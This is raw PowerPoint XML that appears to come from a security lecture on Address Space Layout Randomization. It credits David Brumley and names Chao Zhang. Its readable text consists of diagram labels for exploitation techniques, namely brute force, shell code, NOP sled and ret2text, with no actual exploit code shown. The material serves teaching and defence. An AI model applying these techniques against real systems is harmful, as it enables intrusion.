          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>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32275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2A0AB15E-FFE3-4B47-B9E2-DD4B5E55497A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>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277014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81FD670A-49D5-6B44-876E-D2BDD5B5BF5A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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9115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653081F9-3F3A-B044-B1B3-3E71C9E162B6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</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9520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0"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9272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37AABCFA-591C-9145-B44A-9EFDDC32D4B1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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D01F7D1C-C9EC-E743-9063-B0846E758DFA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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40582EA0-B875-B64A-B17C-15E030E9CF15}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17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74391607-EAAA-2946-9E02-E1C11496083C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</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54391509-7D79-C647-92BF-4A0564F0C41A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</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FBD64FD0-82A6-144B-A86D-7BBA3EAF78C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</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2B93CA3-029B-EF42-8B8C-890C6E340BE0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</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tags" Target="../tags/tag1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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theme" Target="../theme/theme2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag69.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.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6"/>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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9E030486-F0B4-6B43-883D-CC3D390117E7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>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6" r:id="rId13"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cT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5"/>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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9E030486-F0B4-6B43-883D-CC3D390117E7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/6/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}"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9989891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tags" Target="../tags/tag139.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140.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tags" Target="../tags/tag14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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag143.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144.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6.emf"/><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tags" Target="../tags/tag145.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47.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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag148.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1.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag150.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId3"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2.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag151.xml"/><Relationship Id="rId2"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3.emf"/><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152.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153.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154.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55.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tags" Target="../tags/tag156.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157.x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tags" Target="../tags/tag158.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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159.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tags" Target="../tags/tag160.x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tags" Target="../tags/tag162.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ags" Target="../tags/tag163.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164.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag165.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png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag166.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag167.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId3"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tags" Target="../tags/tag168.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId3"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169.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20.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag170.xml"/><Relationship Id="rId2"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23.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag171.xml"/><Relationship Id="rId2"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20.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag172.xml"/><Relationship Id="rId2"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5.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag173.xml"/><Relationship Id="rId2"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag174.x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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag175.xml"/><Relationship Id="rId2"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tags" Target="../tags/tag176.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7.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag177.xml"/><Relationship Id="rId2"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31.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag178.xml"/><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34.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tags" Target="../tags/tag179.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId3"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2.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tags" Target="../tags/tag138.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460468"/>
            <a:ext cx="7924800" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address Space Layout Randomization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(ASLR)</a:t>
            </a:r>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t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="3733800"/>
            <a:ext cx="1718740" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Chao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Zhang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5791200"/>
            <a:ext cx="3620030" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Credit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>slides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>Brumley</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="574898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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2586017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Brute F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>orce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897188" y="3017838"/>
            <a:ext cx="134937" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8E28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80" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2971800"/>
            <a:ext cx="151210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Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1419225" y="2574925"/>
            <a:ext cx="2760663" cy="2770188"/>
            <a:chOff x="241637" y="1296691"/>
            <a:chExt cx="2761937" cy="2768890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval Callout 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="241637" y="1296691"/>
              <a:ext cx="1966232" cy="1274166"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 76089"/>
                <a:gd name="adj2" fmla="val -5751"/>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2866986" y="1737809"/>
              <a:ext cx="136588" cy="257054"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8E28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2866986" y="1994864"/>
              <a:ext cx="136588" cy="2070717"/>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Left Brace 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2630339" y="1994864"/>
              <a:ext cx="236647" cy="207071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4606" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1185047" y="2759680"/>
              <a:ext cx="1395527" cy="4614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NOP Sled</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268413" y="1250950"/>
            <a:ext cx="5021208" cy="5567947"/>
            <a:chOff x="854101" y="1251060"/>
            <a:chExt cx="5021488" cy="5567470"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="854101" y="2397137"/>
              <a:ext cx="3145012" cy="3371561"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 88302"/>
                <a:gd name="adj2" fmla="val -17769"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="468966"/>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5194568" y="1251060"/>
              <a:ext cx="269890" cy="5243064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF0A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5251721" y="3382890"/>
              <a:ext cx="134945" cy="104766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8E28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600" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4767506" y="6418454"/>
              <a:ext cx="1108083" cy="4000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mn-lt"/>
                </a:rPr>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5251721" y="3454321"/>
              <a:ext cx="134945" cy="36826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21504" name="Group 21503"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942008" y="1828800"/>
            <a:ext cx="2363791" cy="4491038"/>
            <a:chOff x="5528666" y="1829515"/>
            <a:chExt cx="2363284" cy="4490818"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5528666" y="6167940"/>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5528666" y="5861567"/>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528666" y="5564720"/>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5528666" y="5239298"/>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528666" y="4913877"/>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5528666" y="4596392"/>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5528666" y="4310656"/>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528666" y="4002696"/>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5528666" y="3705848"/>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5528666" y="3380426"/>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28666" y="3056592"/>
              <a:ext cx="5555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Up Arrow 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5587390" y="2299391"/>
              <a:ext cx="434881" cy="4020942"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 109054"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926">
                <a:alpha val="33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596" name="TextBox 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868347" y="1829515"/>
              <a:ext cx="2023603" cy="954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800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>rute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>force </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>search</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2915351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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3468366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ret2text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
